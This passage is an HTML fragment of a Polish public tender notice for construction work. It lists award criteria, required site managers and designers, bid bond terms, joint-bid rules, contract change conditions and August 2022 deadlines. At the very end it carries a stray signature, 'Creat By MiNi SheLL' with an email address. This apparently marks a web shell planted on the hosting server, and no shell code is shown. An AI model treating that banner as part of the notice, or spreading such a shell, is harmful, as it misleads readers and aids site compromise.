gwarancji w przedziale od 25 do 60 miesięcy będzie podlegało punktacji według poniższego wzoru:<br/>LP= Okres gwarancji badanej oferty /Najdłuższy okres gwarancji spośród ofert nie podlegających odrzuceniu x 40% x 100</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej,tj.: <br/>- posiadają wymagane zdolności techniczne lub zawodowe zapewniające należyte wykonanie zamówienia, w zakresie posiadanego potencjału osobowego. <br/>Wykonawca spełni warunek, jeżeli skieruje do realizacji zamówienia: <br/>a)	co najmniej jedną osobę pełniącą funkcję projektanta posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej, wydane na podstawie aktualnych przepisów prawa budowlanego, lub równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, <br/>b)	co najmniej jedną osobę pełniącą funkcję kierownika budowy, posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń,<br/>c)	co najmniej jedną osobę pełniącą funkcję kierownika robót, posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności elektrycznej,<br/>d)	co najmniej jedną osobę pełniącą funkcję kierownika robót, posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności wodno-kanalizacyjnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie ze wzorem stanowiącym załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	DOKUMENTY SKŁADANE WRAZ Z OFERTĄ: <br/>a)	Formularz ofertowy - załącznik nr 1 do SWZ, <br/>b)	Oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp, traktujące o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu aktualne na dzień składania ofert w zakresie wskazanym w załączniku nr 2 do SWZ, <br/>•	Oświadczenie stanowi wstępne potwierdzenie braku podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu, odpowiednio na dzień składania ofert, <br/>•	Oświadczenie składają odrębnie: <br/>- Wykonawca, <br/>- podmiot udostępniający zasoby, w zakresie w jakim go dotyczy (jeżeli dotyczy) <br/>- każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy); <br/>c)	stosowne pełnomocnictwa (jeżeli dotyczy), <br/>− w przypadku składania oferty wspólnej - pełnomocnictwo podmiotów występujących wspólnie, <br/>− pełnomocnictwo do podpisania oferty, względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z dokumentów potwierdzających uprawnienie do występowania w obrocie prawnym, <br/>d)	zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy – wzór stanowi załącznik nr 3 do SWZ, <br/>Ww. oświadczenie należy złożyć tylko wtedy, gdy Wykonawca polega na zdolnościach lub sytuacji podmiotu udostępniającego zasoby. <br/>e)	oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 117 ust. 4 ustawy Pzp (jeżeli dotyczy), według wzoru - załącznik nr 4 do SWZ <br/>Ww. oświadczenie należy złożyć w przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia. <br/>f)	wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium w kwocie: 10.000,00 złotych (słownie: dziesięć tysięcy złotych 00/100), <br/> <br/>2.	Wadium może być wnoszone, według wyboru Wykonawcy, w jednej lub kilku następujących formach: <br/>1)	pieniądzu, <br/>2)	gwarancjach bankowych; <br/>3)	gwarancjach ubezpieczeniowych; <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. <br/>poz. 310, 836 i 1572). <br/> <br/>3.	Wadium wnosi się przed upływem terminu składania ofert, tj. do dnia 12.08.2022 r., do godz. 10:00 <br/>i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą. <br/> <br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: <br/>05 8517 0007 0060 0000 0026 0029 z dopiskiem „Wadium – nr sprawy IN.271.6.2022.<br/> <br/>5.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/> <br/>6.	Wadium w formie innej niż pieniężna Wykonawca wnosi w postaci elektronicznej poprzez załączenie oryginału dokumentu wadialnego najpóźniej w terminie składania ofert. <br/> <br/>7.	Dokumenty wymienione w ust. 2 pkt 2)–4) muszą uwzględniać postanowienia art. 98 ust. 6 ustawy Pzp. Gwarancja lub poręczenie musi zawierać w swojej treści nieodwołane i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium. <br/> <br/>8.	Zamawiający odrzuca ofertę jeżeli Wykonawca nie wniósł wadium, lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp. <br/><br/>9.	Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium Wykonawcy: <br/>1)	który wycofał ofertę przed upływem terminu składania ofert; <br/>2)	którego oferta została odrzucona; <br/>3)	po wyborze najkorzystniejszej oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza; <br/>4)	po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <br/>10.	Złożenie wniosku o zwrot wadium, o którym mowa powyżej, powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;<br/>2.	dokument pełnomocnictwa może zostać załączony do oferty w: <br/>a)	oryginale w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem osobistym lub popisem zaufanym osoby/osób upoważnionej/upoważnionych do reprezentowania Wykonawcy zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej, lub <br/>b)	elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym, podpisem osobistym lub popisem zaufanym osoby posiadającej uprawnienia notariusza; <br/>c)	w przypadku gdy pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. <br/>3.	pełnomocnictwo musi być załączone do oferty i zawierać w szczególności wskazanie: <br/>a)	postępowania o zamówienie publiczne, którego dotyczą, <br/>b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, <br/>c) ustanowionego pełnomocnika oraz zakresu jego umocowania; <br/>4.	wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem; <br/>5.	informacje dotyczące składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia podmiotowych środków dowodowych w ramach przedmiotowego zamówienia zostały określone w Części VIII SWZ; <br/>6.	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia brak podstaw wykluczenia musi wykazać każdy z Wykonawców oddzielnie, wobec powyższego wszystkie oświadczenia i dokumenty w zakresie braku podstaw wykluczenia wymagane w postępowaniu składa odrębnie każdy z Wykonawców wspólnie występujących; <br/>7.	przed zawarciem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić Zamawiającemu kopię umowy regulującej współpracę tych Wykonawców, zawierającą co najmniej: <br/>1)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia, <br/>2)	określenie zakresu działania poszczególnych stron umowy; <br/>8. czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne są zmiany umowy w zakresie:<br/>1) zmiany wysokości wynagrodzenia w przypadku:<br/>a) zmiany stawki od towarów i usług oraz podatku akcyzowego, <br/>b)zmiany wysokości minimalnego wynagrodzenia za pracę,<br/>c) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne,<br/>d) zmiany zasad gromadzenia i wysokości wpłat dla pracowniczych planów kapitałowych, o których mowa w ustawie z 4 października 2018r. o pracowniczych planach kapitałowych,<br/>e) zmiany cen materiałów lub kosztów związanych z realizacją zamówienia,<br/>f) wystąpienia konieczności wykonania robót dodatkowych na podstawie okoliczności, o których mowa w art.455 ust 1 pkt 3 ustawy Pzp;<br/>g) wystąpienia konieczności zastosowania rozwiązania projektowego zamiennego, którego nie można było przewidzieć na etapie wykonania projektów budowlanych i na etapie uzyskania decyzji o pozwoleniu na budowę, bez którego wykonanie przedmiotu zamówienia byłby niemożliwe bądź obarczone błędem - szczegółowe wymagania i warunki na podst. których można dokonać zmian określone są w projektowanych postanowieniach umowy w § 14 ust. 1 pkt 1) - zał. nr 8 do SWZ;<br/>2) zmiany zakresu/sposobu realizacji świadczenia, w przypadku i na warunkach określonych w projektowanych postanowieniach umowy w § 14 ust. 1 pkt 2) - zał. nr 8 do SWZ;<br/>3) zmiana terminów wykonania Umowy w przypadku i na warunkach określonych w projektowanych postanowieniach umowy § 14 ust. 1 pkt 3) - zał. nr 8 do SWZ,<br/>4) zmiana albo rezygnacja z podwykonawcy, na którego zasoby Wykonawca powołał się, na zasadach określonych w art. 118 ust. 1 ustawy Pzp w celu wskazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 118 ust. 1 ustawy Pzp, na warunkach określonych w projektowanych postanowieniach umowy § 14 ust. 1 pkt 4) - zał. nr 8 do SWZ,<br/>5) zmian osób sprawujących samodzielne funkcje techniczne, ujętych w wykazie osób złożonych przez Wykonawcą, pod warunkiem, że osoba wskazana do przyjęcia tych obowiązków będzie posiadała przygotowanie i kwalifikacje co najmniej równe osobie dotychczas pełniącej tę funkcję oraz będzie spełniała wymogi określone w SWZ na warunkach określonych w projektowanych postanowieniach umowy § 14 ust. 1 pkt 5) - zał. nr 8 do SWZ;<br/>Ze względu na ograniczona możliwość zastosowania znaków szczegółowe warunki na postawie których zmiany będą możliwe zostały określone w projektowanych postanowieniach umowy § 14 zał. nr 8 do SWZ; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wykonawca zobowiązany jest przed zawarciem umowy wnieść zabezpieczenie należytego wykonania umowy w wysokości 5 % ceny brutto podanej w ofercie. <br/>2. Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub sytuacji ekonomicznej lub finansowej podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>4.	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz oświadczeniem, o którym mowa w art. 125 ust. 1 ustawy Pzp, oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw do wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby. <br/>5. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór zobowiązania stanowi załącznik nr 3 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com